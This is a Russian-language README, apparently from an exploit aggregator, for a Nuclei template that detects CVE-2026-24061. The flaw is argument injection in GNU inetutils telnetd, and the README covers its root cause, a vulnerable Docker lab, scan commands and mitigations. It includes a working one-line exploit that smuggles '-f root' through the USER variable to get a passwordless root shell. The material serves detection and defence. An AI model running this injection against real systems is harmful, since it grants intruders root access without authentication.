## https://sploitus.com/exploit?id=1C3F4123-B92C-5712-8244-A4A8088F9F4B
# CVE-2026-24061 - Telnet Argument Injection
Nuclei template для обнаружения уязвимости CVE-2026-24061 в GNU inetutils telnetd, позволяющей получить root доступ без аутентификации.
## 📋 Описание уязвимости
CVE-2026-24061 - это критическая уязвимость **argument injection** в GNU inetutils telnetd, которая позволяет атакующему получить root shell без знания пароля.
### Как это работает?
1. **Корень проблемы**: В 2015 году в telnetd был добавлен новый шаблон логина с динамическим параметром `%U`:
```
/usr/bin/login -p -h %h %?u{-f %u}{%U}
```
2. **Уязвимость**: Переменная окружения `USER` передаётся через telnet протокол (RFC 1572 NEW-ENVIRON) и **не санитизируется** перед подстановкой в команду.
3. **Эксплуатация**: Атакующий устанавливает `USER="-f root"` при подключении:
```bash
USER="-f root" telnet -a target.com 23
```
4. **Результат**: Команда логина превращается в:
```bash
/usr/bin/login -p -h hostname -f root
```
Флаг `-f` означает "skip authentication" → **root без пароля** 💀
## 🎯 Затронутые версии
- GNU inetutils telnetd с уязвимым шаблоном логина
- Например: `inetutils-telnetd 2:2.0-1+deb11u2`
- Системы где telnetd использует автологин без Kerberos
## 🚀 Использование
### Базовое сканирование
```bash
nuclei -t cve-2026-24061.yaml -u target.com:23 -code
```
### Множественные цели
```bash
nuclei -t cve-2026-24061.yaml -l targets.txt -code
```
## 🔬 Тестовая лаборатория
Для тестирования можно поднять уязвимый Docker контейнер:
```dockerfile
FROM debian:11-slim
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*
RUN useradd user1 && \
sed -i 's/## telnet/telnet/' /etc/inetd.conf
EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]
```
Запуск:
```bash
# Собрать образ
docker build -t vuln-telnetd .
# Запустить
docker run -d -p 2323:23 vuln-telnetd
# Проверить уязвимость
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v
```
## 🛡️ Защита
1. **Обновить inetutils** до исправленной версии
2. **Отключить telnetd** и использовать SSH
3. **Фильтровать** порт 23 на файрволе
4. **Мониторить** подключения к telnet
## 📚 Ссылки
- [NVD - CVE-2026-24061](https://nvd.nist.gov/vuln/detail/CVE-2026-24061)
- [SafeBreach Labs - Root Cause Analysis](https://www.safebreach.com/blog/safebreach-labs-root-cause-analysis-and-poc-exploit-for-cve-2026-24061/)
## 📊 CVSS Score
**9.8 / 10** - Critical
```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
```
- **AV:N** - Network (атака по сети)
- **AC:L** - Low complexity (легко эксплуатировать)
- **PR:N** - No privileges required (не нужна аутентификация)
- **UI:N** - No user interaction (автоматическая эксплуатация)
- **C:H/I:H/A:H** - High impact на конфиденциальность, целостность и доступность
## ⚠️ Дисклеймер
Этот инструмент предназначен **только для легального тестирования безопасности** систем, на которые у вас есть явное разрешение.
Автор не несёт ответственности за неправомерное использование данного шаблона.
## 👤 Автор
Created by Mr.Zapi
---
**Найдено уязвимостей?** Сообщите владельцам системы через responsible disclosure! 🔒